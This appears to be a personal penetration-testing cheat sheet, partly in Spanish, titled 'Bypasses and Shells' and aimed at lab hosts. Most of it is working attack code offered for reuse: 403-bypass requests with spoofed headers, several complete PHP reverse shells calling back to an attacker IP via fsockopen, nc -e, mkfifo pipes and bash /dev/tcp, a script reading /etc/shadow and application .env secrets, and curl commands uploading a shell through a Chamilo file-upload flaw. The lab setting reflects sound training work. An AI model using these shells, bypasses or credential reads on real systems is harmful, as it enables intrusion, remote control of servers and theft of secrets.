Bypasses and Shells
Bypasses and Shells
403 bypasser
Explanation of the Request:
The provided HTTP request is as follows:
1
2
3
4
5
6
7
8
9
10
11
GET /2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
Host: merchan.thl
Referer: http://merchan.thl/
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://merchan.thl/
Purpose of the Request:
Attempts to access the PHP file
/2e81eb4e952a3268babddecad2a4ec1e.phpon the hostmerchan.thl.The use of a Referer header indicates the request originated from
http://merchan.thl/, which can sometimes be manipulated to bypass restrictions.The headers mimic a legitimate browser, which may help avoid detection or bypass basic filters.
In-Depth Explanation of 403 Bypass Techniques
HTTP status 403 Forbidden means the server understood the request but refuses to authorize it. Common in web security scenarios where directory or file access is restricted.
Bypassing a 403 can be achieved through a combination of:
1. URL Path Obfuscation Techniques
Altering the path to trick the server:
- Adding slashes or encodings:
1
2
3
4
GET /2e81eb4e952a3268babddecad2a4ec1e.php/ HTTP/1.1
GET /2e81eb4e952a3268babddecad2a4ec1e.php%20 HTTP/1.1
GET /2e81eb4e952a3268babddecad2a4ec1e.php. HTTP/1.1
GET /2e81eb4e952a3268babddecad2a4ec1e.php%2e/ HTTP/1.1
- Double encoding:
1
GET /%252e/2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
- Adding file extensions:
1
GET /2e81eb4e952a3268babddecad2a4ec1e.php.html HTTP/1.1
These tricks exploit inconsistencies between how front-end filters and back-end servers interpret paths.
2. Header Manipulation Techniques
Altering headers to bypass security filters that depend on them:
- Spoofing the Referer header:
1
Referer: https://trusted-domain.com/
- Using trusted IP headers:
1
2
3
X-Forwarded-For: 127.0.0.1
X-Original-URL: /2e81eb4e952a3268babddecad2a4ec1e.php
X-Rewrite-URL: /2e81eb4e952a3268babddecad2a4ec1e.php
- Example combining:
1
2
3
GET /2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
Host: merchan.thl
X-Forwarded-For: 127.0.0.1
Some servers allow local IPs (127.0.0.1, localhost) to bypass restrictions.
3. HTTP Method Variation
Sometimes restrictions apply only to specific methods:
- Trying different methods:
1
2
HEAD /2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
OPTIONS /2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
Alternatively, some web servers misconfigure method handling where non-standard methods still process the request.
4. Using Alternate Host Headers (Virtual Host Confusion)
1
Host: localhost
If the web server handles different virtual hosts, targeting localhost may bypass restrictions.
5. Directory Traversal or Path Bypass
If applicable:
1
2
GET /..;/2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
GET /.%2e/2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1
Common Tools to Automate 403 Bypass Attempts
WFuzz with payload lists for bypasses.
Burp Suite Intruder with crafted header/payload combinations.
ffuf for URL fuzzing with encoding tricks.
Example with ffuf:
1
ffuf -u http://merchan.thl/FUZZ -w bypass-403-payloads.txt -H "X-Forwarded-For: 127.0.0.1"
Summary
403 bypass techniques exploit:
URL parsing discrepancies.
Header-based trust mechanisms.
Improper filtering or access control logic.
Weak server-side validation.
During a Red Team engagement or web exploitation phase, systematically combining these approaches often reveals misconfigurations or vulnerabilities, enabling unauthorized access to protected resources.
PHP Reverse Shell
Shell debug for Ivan Sincek reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
<?php
// Debug version of Ivan Sincek's shell
error_reporting(E_ALL);
ini_set('display_errors', 1);
class Shell {
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w')
);
private $buffer = 1024;
private $clen = 0;
private $error = false;
public function __construct($addr, $port) {
$this->addr = $addr;
$this->port = $port;
}
private function detect() {
$detected = true;
if (stripos(PHP_OS, 'LINUX') !== false) {
$this->os = 'LINUX';
$this->shell = '/bin/bash';
} else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
$this->os = 'WINDOWS';
$this->shell = 'cmd.exe';
} else {
$detected = false;
echo "SYS_ERROR: Underlying operating system is not supported\n";
}
echo "DEBUG: OS detected as {$this->os}, shell: {$this->shell}\n";
return $detected;
}
private function settings() {
@error_reporting(0);
@set_time_limit(0);
@umask(0);
}
public function run() {
if ($this->detect()) {
$this->settings();
echo "DEBUG: Attempting to connect to {$this->addr}:{$this->port}\n";
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if (!$socket) {
echo "SOC_ERROR: {$errno}: {$errstr}\n";
return;
}
echo "DEBUG: Socket connected successfully\n";
stream_set_blocking($socket, false);
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if (!$process) {
echo "PROC_ERROR: Cannot start the shell\n";
fclose($socket);
return;
}
echo "DEBUG: Shell process started\n";
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false);
}
$status = proc_get_status($process);
@fwrite($socket, "Shell connected! PID: " . $status['pid'] . "\n");
@fwrite($socket, "OS: " . $this->os . "\n");
@fwrite($socket, "Shell: " . $this->shell . "\n");
// Simple shell loop
while (true) {
$status = proc_get_status($process);
if (!$status['running']) {
echo "DEBUG: Process died\n";
break;
}
if (feof($socket)) {
echo "DEBUG: Socket closed\n";
break;
}
$read = array($socket, $pipes[1], $pipes[2]);
$write = null;
$except = null;
$num_changed = @stream_select($read, $write, $except, 1);
if ($num_changed === false) {
echo "DEBUG: stream_select failed\n";
break;
}
if ($num_changed > 0) {
if (in_array($socket, $read)) {
$input = fread($socket, $this->buffer);
if ($input !== false && strlen($input) > 0) {
fwrite($pipes[0], $input);
}
}
if (in_array($pipes[1], $read)) {
$output = fread($pipes[1], $this->buffer);
if ($output !== false && strlen($output) > 0) {
fwrite($socket, $output);
}
}
if (in_array($pipes[2], $read)) {
$error = fread($pipes[2], $this->buffer);
if ($error !== false && strlen($error) > 0) {
fwrite($socket, $error);
}
}
}
}
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
fclose($socket);
echo "DEBUG: Shell session ended\n";
}
}
}
echo '<pre>';
// Cambia la IP por tu IP de atacante
$sh = new Shell('192.168.0.26', 4444);
$sh->run();
unset($sh);
echo '</pre>';
?>
Netcat reverse shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
// Diferentes métodos para ejecutar netcat
$ip = '192.168.0.26';
$port = '4444';
// Método 1: nc tradicional
$cmd1 = "nc -e /bin/bash $ip $port";
// Método 2: nc sin -e
$cmd2 = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $ip $port >/tmp/f";
// Método 3: bash
$cmd3 = "bash -i >& /dev/tcp/$ip/$port 0>&1";
// Método 4: ncat
$cmd4 = "ncat -e /bin/bash $ip $port";
echo "Intentando conectar...\n";
// Intentar cada método
$commands = array($cmd1, $cmd2, $cmd3, $cmd4);
foreach ($commands as $cmd) {
echo "Probando: $cmd\n";
$result = shell_exec($cmd . ' 2>&1 &');
if ($result !== null) {
echo "Ejecutado: $result\n";
}
sleep(1);
}
?>
Shell exec reverse shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
set_time_limit(0);
$ip = '192.168.0.26'; // Tu IP
$port = 4444; // Tu puerto
echo "DEBUG: Intentando conectar a $ip:$port\n";
// Método 1: Usando shell_exec con named pipe
$cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $ip $port >/tmp/f";
echo "DEBUG: Ejecutando comando: $cmd\n";
$output = shell_exec($cmd . ' 2>&1 &');
echo "DEBUG: Resultado shell_exec: " . ($output ? $output : "Sin salida") . "\n";
// Método 2: Si shell_exec no funciona, probar con system()
if (!$output) {
echo "DEBUG: Probando con system()\n";
$result = system($cmd . ' 2>&1 &', $return_var);
echo "DEBUG: system() return code: $return_var\n";
}
// Método 3: Usando exec()
if (!$output) {
echo "DEBUG: Probando con exec()\n";
$exec_output = array();
$exec_result = exec($cmd . ' 2>&1 &', $exec_output, $exec_return);
echo "DEBUG: exec() return code: $exec_return\n";
echo "DEBUG: exec() output: " . implode("\n", $exec_output) . "\n";
}
// Método 4: bash TCP connection directa
$bash_cmd = "bash -i >& /dev/tcp/$ip/$port 0>&1";
echo "DEBUG: Probando bash TCP: $bash_cmd\n";
$bash_output = shell_exec($bash_cmd . ' 2>&1 &');
echo "DEBUG: Bash TCP resultado: " . ($bash_output ? $bash_output : "Sin salida") . "\n";
echo "DEBUG: Todos los métodos ejecutados\n";
?>
Allowed php functions tester
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<?php
echo "<h2>Verificando funciones PHP disponibles</h2>\n";
$dangerous_functions = array(
'exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'proc_close',
'proc_get_status', 'proc_nice', 'proc_terminate', 'escapeshellarg',
'escapeshellcmd', 'file_get_contents', 'file_put_contents', 'fopen',
'fwrite', 'fclose', 'readfile', 'fsockopen', 'pfsockopen', 'socket_create'
);
echo "<h3>Funciones de ejecución:</h3>\n";
foreach ($dangerous_functions as $func) {
if (function_exists($func)) {
echo "✓ $func - DISPONIBLE\n";
} else {
echo "✗ $func - NO DISPONIBLE\n";
}
}
echo "\n<h3>Funciones deshabilitadas:</h3>\n";
$disabled = explode(',', ini_get('disable_functions'));
foreach ($disabled as $func) {
echo "- " . trim($func) . "\n";
}
echo "\n<h3>Información del sistema:</h3>\n";
echo "PHP Version: " . phpversion() . "\n";
echo "OS: " . php_uname() . "\n";
echo "Server: " . $_SERVER['SERVER_SOFTWARE'] . "\n";
echo "User: " . get_current_user() . "\n";
echo "Working Directory: " . getcwd() . "\n";
echo "Open Basedir: " . ini_get('open_basedir') . "\n";
echo "\n<h3>Test de comandos:</h3>\n";
// Test shell_exec
if (function_exists('shell_exec')) {
$test = shell_exec('whoami 2>&1');
echo "shell_exec('whoami'): " . ($test ? $test : "Sin salida") . "\n";
$test2 = shell_exec('id 2>&1');
echo "shell_exec('id'): " . ($test2 ? $test2 : "Sin salida") . "\n";
$test3 = shell_exec('which nc 2>&1');
echo "shell_exec('which nc'): " . ($test3 ? $test3 : "Sin salida") . "\n";
$test4 = shell_exec('which bash 2>&1');
echo "shell_exec('which bash'): " . ($test4 ? $test4 : "Sin salida") . "\n";
}
// Test exec
if (function_exists('exec')) {
$output = array();
exec('whoami 2>&1', $output);
echo "exec('whoami'): " . implode("\n", $output) . "\n";
}
// Test system
if (function_exists('system')) {
echo "system('whoami'): ";
system('whoami 2>&1');
echo "\n";
}
?>
fsockopen reverse shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
<?php
set_time_limit(0);
$ip = '192.168.0.26';
$port = 4444;
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
exit();
}
// Enviar información inicial
fwrite($sock, "=== PHP Enhanced Socket Shell ===\n");
fwrite($sock, "Connected from: " . $_SERVER['SERVER_NAME'] . "\n");
fwrite($sock, "PHP Version: " . phpversion() . "\n");
fwrite($sock, "OS: " . php_uname() . "\n");
fwrite($sock, "Working Directory: " . getcwd() . "\n");
fwrite($sock, "User: " . get_current_user() . "\n");
fwrite($sock, "UID: " . getmyuid() . " GID: " . getmygid() . "\n");
fwrite($sock, "================================\n");
fwrite($sock, "Available commands: ls, cd, pwd, whoami, cat, find, download, upload, help\n");
fwrite($sock, "$ ");
$current_dir = getcwd();
// Loop principal
while (!feof($sock)) {
$command = trim(fgets($sock, 1024));
if (empty($command)) {
fwrite($sock, "$ ");
continue;
}
$parts = explode(' ', $command, 2);
$cmd = $parts[0];
$args = isset($parts[1]) ? $parts[1] : '';
$output = '';
switch ($cmd) {
case 'exit':
case 'quit':
fwrite($sock, "Goodbye!\n");
break 2;
case 'help':
$output = "Available commands:\n";
$output .= " ls [dir] - List directory contents\n";
$output .= " cd <dir> - Change directory\n";
$output .= " pwd - Show current directory\n";
$output .= " whoami - Show current user\n";
$output .= " cat <file> - Display file contents\n";
$output .= " find <name> - Find files/directories\n";
$output .= " download <file> - Download file (base64)\n";
$output .= " upload <file> - Upload file (base64)\n";
$output .= " phpinfo - Show PHP configuration\n";
$output .= " env - Show environment variables\n";
$output .= " processes - Show running processes\n";
$output .= " netstat - Show network connections\n";
$output .= " help - Show this help\n";
$output .= " exit/quit - Exit shell\n";
break;
case 'pwd':
$output = getcwd() . "\n";
break;
case 'whoami':
$output = get_current_user() . "\n";
break;
case 'ls':
$dir = empty($args) ? '.' : $args;
if (is_dir($dir)) {
$files = scandir($dir);
$output = '';
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$full_path = $dir . '/' . $file;
$perms = substr(sprintf('%o', fileperms($full_path)), -4);
$size = is_file($full_path) ? filesize($full_path) : 0;
$type = is_dir($full_path) ? 'd' : '-';
$output .= sprintf("%s%s %8d %s\n", $type, $perms, $size, $file);
}
} else {
$output = "ls: $dir: No such file or directory\n";
}
break;
case 'cd':
if (empty($args)) {
$output = "cd: missing argument\n";
} else {
if (chdir($args)) {
$current_dir = getcwd();
$output = "Changed to: $current_dir\n";
} else {
$output = "cd: $args: No such file or directory\n";
}
}
break;
case 'cat':
if (empty($args)) {
$output = "cat: missing file argument\n";
} else {
if (file_exists($args) && is_readable($args)) {
$content = file_get_contents($args);
$output = $content . "\n";
} else {
$output = "cat: $args: No such file or directory or permission denied\n";
}
}
break;
case 'find':
if (empty($args)) {
$output = "find: missing search term\n";
} else {
$output = findFiles('.', $args);
}
break;
case 'download':
if (empty($args)) {
$output = "download: missing file argument\n";
} else {
if (file_exists($args) && is_readable($args)) {
$content = file_get_contents($args);
$encoded = base64_encode($content);
$output = "=== FILE START ===\n";
$output .= "Filename: $args\n";
$output .= "Size: " . strlen($content) . " bytes\n";
$output .= "Base64:\n";
$output .= chunk_split($encoded, 76);
$output .= "=== FILE END ===\n";
} else {
$output = "download: $args: Cannot read file\n";
}
}
break;
case 'phpinfo':
ob_start();
phpinfo();
$output = ob_get_contents();
ob_end_clean();
// Limpiar HTML tags
$output = strip_tags($output);
break;
case 'env':
$output = "Environment variables:\n";
foreach ($_SERVER as $key => $value) {
$output .= "$key=$value\n";
}
break;
case 'processes':
// Intentar leer /proc para obtener información de procesos
if (is_dir('/proc')) {
$output = "Process information:\n";
$procs = glob('/proc/[0-9]*');
foreach (array_slice($procs, 0, 10) as $proc) {
$pid = basename($proc);
$cmdline_file = "$proc/cmdline";
if (file_exists($cmdline_file)) {
$cmdline = file_get_contents($cmdline_file);
$cmdline = str_replace("\0", " ", $cmdline);
$output .= sprintf("%6s %s\n", $pid, $cmdline);
}
}
} else {
$output = "Cannot access /proc filesystem\n";
}
break;
case 'netstat':
// Intentar leer información de red
if (file_exists('/proc/net/tcp')) {
$output = "Network connections:\n";
$tcp_data = file_get_contents('/proc/net/tcp');
$lines = explode("\n", $tcp_data);
foreach (array_slice($lines, 1, 10) as $line) {
if (trim($line)) {
$output .= $line . "\n";
}
}
} else {
$output = "Cannot access network information\n";
}
break;
default:
// Intentar usar backticks como último recurso
try {
$result = `$command 2>&1`;
if ($result) {
$output = $result;
} else {
$output = "Command not recognized or no output. Type 'help' for available commands.\n";
}
} catch (Exception $e) {
$output = "Command not recognized. Type 'help' for available commands.\n";
}
break;
}
fwrite($sock, $output);
fwrite($sock, "$ ");
}
fclose($sock);
// Función auxiliar para buscar archivos
function findFiles($dir, $pattern) {
$result = "";
$files = scandir($dir);
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$full_path = $dir . '/' . $file;
if (stripos($file, $pattern) !== false) {
$result .= $full_path . "\n";
}
if (is_dir($full_path) && is_readable($full_path)) {
$result .= findFiles($full_path, $pattern);
}
}
return $result;
}
?>
File-Get
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
$files = [
'/etc/passwd',
'/etc/shadow',
'/var/www/html/chamilo-lms/config/configuration.php',
'/var/www/html/chamilo-lms/.env',
'/proc/version',
'/proc/cpuinfo'
];
foreach ($files as $file) {
echo "<h3>$file</h3>";
if (file_exists($file)) {
if (is_readable($file)) {
echo "<pre>" . htmlspecialchars(file_get_contents($file)) . "</pre>";
} else {
echo "<pre>[!] El archivo existe pero no es legible (permisos insuficientes)</pre>";
}
} else {
echo "<pre>[!] El archivo no existe o la ruta es incorrecta</pre>";
}
}
?>
For example use one of this if you need to upload a php reverse shell as for example permx (chamilo vulnerability):
Chamilo vulnerability
1
2
curl -F 'bigUploadFile=@check_functions.php' 'http://aceitunabrava.thl/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
curl 'http://aceitunabrava.thl/main/inc/lib/javascript/bigupload/files/check_functions.php'
Password Attacks
This post is licensed under CC BY 4.0 by the author.